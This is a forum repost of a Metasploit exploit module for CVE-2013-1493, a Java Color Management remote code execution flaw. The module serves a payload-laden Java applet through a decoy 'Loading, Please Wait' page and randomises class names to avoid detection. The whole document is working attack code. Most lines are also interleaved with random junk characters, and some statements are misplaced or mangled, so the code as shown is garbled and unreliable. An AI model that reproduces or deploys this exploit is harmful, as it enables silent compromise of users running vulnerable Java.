##
. e0 F) X; q: Q# f2 Q( r1 C p3 l
) K/ ^# c- u4 d& U! b' K( u# This file is part of the Metasploit Framework and may be subject to7 Q( m) a9 `* B
# redistribution and commercial restrictions. Please see the Metasploit+ d( @1 w8 u4 v$ m2 e
# web site for more information on licensing and terms of use.
( J8 A2 N3 W! }* J) v. Y# http://metasploit.com/
5 s2 z0 v+ }/ z6 ?##. a9 Q: `8 A1 ~) d
require ‘msf/core’4 w8 \. b9 F. U9 J
require ‘rex’7 X4 D# s3 ~" G
class Metasploit3 < Msf::Exploit::Remote+ l$ J! [" J8 n$ d! i" n. G2 [
Rank = NormalRanking7 X; e+ t( b6 K
include Msf::Exploit::Remote::HttpServer::HTML
5 _( t! L' M6 y/ ]include Msf::Exploit::EXE) ~5 \2 o% N8 N1 U- s3 b- @
include Msf::Exploit::Remote::BrowserAutopwn. w* _ H. H6 i$ r# x
autopwn_info({ :javascript => false })" l, T L3 r; z7 `4 r
def initialize( info = {} )
$ N3 ^8 D7 |+ \super( update_info( info,! h- E7 S8 r5 w) F* t4 _
‘Name’ => ‘Java CMM Remote Code Execution’,
# f$ S' S* s" D‘Description’ => %q{5 Z, x2 m. V+ @
This module abuses the Color Management classes from a Java Applet to run4 u+ t! m" u9 g" T
arbitrary Java code outside of the sandbox as exploited in the wild in February* n$ \2 r, W9 \- b; @# H
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
; ~ I+ {* A( _7 q; R ^and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
. H1 l. P! z# t% s9 F* Y$ osystems. This exploit doesn’t bypass click-to-play, so the user must accept the java% G/ p0 w. n1 y" U
warning in order to run the malicious applet.
6 w6 p& e! h7 P+ ~8 ~( U$ E},( w) H$ I8 j- k3 ~- Y4 |
‘License’ => MSF_LICENSE,
1 z1 S7 m9 J+ s‘Author’ =>
1 i7 g- G, y& C$ ?! W( h) K3 r8 E'Unknown', # Vulnerability discovery and Exploit5 Z1 K# t8 M) Y7 U r
'juan vazquez' # Metasploit module (just ported the published exploit)
' |: {( d( L& R v! m( e9 M],! d. x( S% g; y% P' S9 V
‘References’ =>
7 ^) J3 ~8 ?! z0 Y[
4 Z- K/ b0 M" l9 }- w[ 'CVE', '2013-1493' ],1 D: v j6 M' T. x% H
[ 'OSVDB', '90737' ],8 b: |8 d7 ~) J' }5 _
[ 'BID', '58238' ],& F% c h* C6 q* W( v
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],: \' m' \# @3 P/ @$ G0 o( @/ W
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],0 V3 B; J9 r' {
[ 'URL', 'http://pastie.org/pastes/6581034' ]
3 x/ \" V+ [9 s: p2 N/ n],
2 [+ f; D9 N6 O4 B3 k‘Platform’ => [ 'win', 'java' ],
' a5 Q" c8 r8 X; d0 z5 F' k2 ^‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
9 I+ y% E- c- g/ O- E" z7 y‘Targets’ =>
8 {5 r1 F8 p9 D( q& ]5 B* R[
/ R; |$ A! F# U2 S6 o0 l[ 'Generic (Java Payload)',$ g6 z# l, V6 j1 ^' f; z" O
{( b* m- f$ I) f, W" _
'Platform' => 'java',
3 a1 B8 N6 J+ K. U/ B* h'Arch' => ARCH_JAVA
0 ~ I: k7 I/ H1 ? H& x4 y}
4 ~( R4 G2 Z/ U4 b0 P],2 O. P6 f/ f7 q/ a0 Z0 d
[ 'Windows x86 (Native Payload)',
3 q! t$ ]: _, i{+ ?# |* ?, ~ f8 x$ N4 S
'Platform' => 'win',+ b k; H/ a% `8 n, E
'Arch' => ARCH_X86
& x* R. Z" s7 U6 L1 Q7 |}$ j, l6 |' b+ n; m6 ^. L3 w
]# @7 w7 `# c+ }% ^3 M" t5 M
],6 a: O: \0 s J' Y
‘‘DisclosureDate’ => ‘Mar 01 2013′
0 w# S7 ^1 l6 j9 F3 {% _)); T- e/ f- F0 i6 _* s/ ~: V
end
, i4 d/ X6 I" ^: U5 _0 D8 [) gdef setup1 e9 p" D1 G P3 W" g7 ?
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)5 H4 R3 m8 S0 e/ Q9 u
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. V" P+ }' e$ t
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
7 L, v8 i: K# F3 y9 Q1 @& h@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }: H# O% f* F$ u/ |+ k W
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)+ a: k. x' @6 P) {% j5 [# L
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }" N2 w! [3 S# G0 |
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
5 G7 r- E G' L0 H% j! x( i@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) } c' O0 }- a9 F, |
@init_class_name = rand_text_alpha(“Init”.length)) k0 s; I6 H6 a. ]. f6 v, p' a* e5 w
@init_class.gsub!(“Init”, @init_class_name)' |. c: K0 B4 z. G$ G
super
2 X' Z2 y# ~3 k+ n( Jend6 C1 B8 Q9 d0 p7 h" I
def on_request_uri(cli, request)
6 ]" l' t' l; [" C4 n( Xprint_status(“handling request for #{request.uri}”)
* [/ `4 j9 n, z+ Lcase request.uri
: p1 p0 D6 w3 \7 C3 K. Owhen /\.jar$/i( y h W _# ]: @: g
jar = payload.encoded_jar, I+ S& }3 p6 C
jar.add_file(“#{@init_class_name}.class”, @init_class)
. K0 J) j: w1 m9 ]$ Gjar.add_file(“Leak.class”, @leak_class)+ V& @8 T+ k0 M/ p" R+ f' m
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)7 X0 f( G# B9 I. o" n% A
jar.add_file(“MyColorSpace.class”, @color_space_class)
0 F( D! G9 H* k. l7 `4 P( Q3 JDefaultTarget’ => 1,
( z' F1 Y3 u- W) x* @( c- _metasploit_str = rand_text_alpha(“metasploit”.length)
0 B9 ]2 }+ m$ w" G6 s5 @, rpayload_str = rand_text_alpha(“payload”.length)
( b: e( X4 }$ x. z( G2 p: y2 [' ojar.entries.each { |entry|9 {6 T$ M' N4 R" A! G! p* F P c
entry.name.gsub!(“metasploit”, metasploit_str)" E$ c( p8 H" F. L! {
entry.name.gsub!(“Payload”, payload_str)$ N' n( M' {. j" a/ \2 [& X
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
0 X2 _; f+ N/ Z& E$ V6 }+ Bentry.data = entry.data.gsub(“Payload”, payload_str)7 H# \( l2 x) k) h2 v5 x
}
& k6 [4 k3 \7 v: Jjar.build_manifest
! n% W/ f9 i/ l3 r7 \* ssend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })* @% V4 t" g; }
when /\/$/ g; p7 B6 k# D% b6 E
payload = regenerate_payload(cli)* B$ V. u! Q8 ~& w
if not payload
- I) X( `6 }* |% B" m1 gprint_error(“Failed to generate the payload.”)$ Q8 U+ Z( f, ?0 B. G
send_not_found(cli)
& @* u' Q8 ]) x5 w3 m5 f9 Mreturn4 ]9 _, [/ U% Q0 P# U
end, R% r( j8 W, v& L! x" F
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })7 g! c8 [4 [' ]; L1 J- ^8 K
else
, P5 P! X- M3 `send_redirect(cli, get_resource() + ‘/’, ”)- X! M4 F$ d+ ]# g D
end
# k1 M2 K2 }4 |( ?end3 n u6 N4 @6 J+ ]. v+ V, L
def generate_html
- e5 [- h- b s$ w: [! O+ J- p; yhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|3 J# ]" W( l* O) q/ n4 e
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|" t( `& r' x0 F: I9 e
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|" Q1 A! E# a2 e: \# h
html += %Q|</applet></body></html>|
0 N- b& F9 g! q) Areturn html
& g! T, X% F! wend
9 L" h8 J+ U5 j7 B2 i' \$ q! Zend
m- U0 _6 E# e4 `, {3 J) P/ y$ D* ^end) E1 ^( x+ R; `% v% I& r/ [& y
|
发表于 2013-4-4 17:31:17
收藏
支持
反对